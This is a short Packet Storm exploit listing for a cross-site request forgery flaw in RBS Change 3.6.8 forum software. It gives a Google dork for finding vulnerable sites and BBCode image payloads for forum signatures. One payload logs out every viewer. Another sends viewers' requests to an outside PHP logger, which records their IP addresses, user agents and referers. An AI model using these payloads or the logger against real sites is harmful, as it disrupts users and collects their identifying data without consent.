RBS Change Complet Open Source Cross Site Request Forgery

2014-10-02T00:00:00
ID PACKETSTORM:128533
Type packetstorm
Reporter KrustyHack
Modified 2014-10-02T00:00:00

Description

                                        
                                            `# Exploit Title: RBS Change Complet Open Source CSRF  
# Google Dork: intext:"une réalisation rbs"  
# Date: 10/01/2014  
# Exploit Author: KrustyHack  
# Vendor Homepage: http://www.rbschange.fr/  
# Software Link: http://www.rbschange.fr/addons/distributions/RBS-Change-complet-Open-Source,67203.html  
# Version: 3.6.8  
# Tested on: Linux  
  
HOW TO  
======  
  
Just add [img="http://CSRF"][/img] on forum signature or forum posts.  
  
TEST  
====  
  
Based on demo.rbschange.fr:  
---------------------------  
  
[img="http://server/fr/deconnexion/"][/img]  
  
Will disconnect all users who load the image.  
  
Other example:  
--------------  
  
[img="http://www.example.com/log.php"][/img]  
  
<?php  
$ip = $_SERVER['REMOTE_ADDR'];  
$ip_proxy = $_SERVER['HTTP_X_FORWARDED_FOR'];  
$rem_port = $_SERVER['REMOTE_PORT'];  
$user_agent = $_SERVER['HTTP_USER_AGENT'];  
$rqst_method = $_SERVER['METHOD'];  
$rem_host = $_SERVER['REMOTE_HOST'];  
$referer = $_SERVER['HTTP_REFERER'];  
  
file_put_contents("log.txt", "[".date('l jS \of F Y h:i:s A')."] [$ip_proxy]$ip - $rem_port - $user_agent - $rqst_method - $rem_host - $referer\n", FILE_APPEND);  
  
?>  
  
To get users ip, user agent, ...  
  
`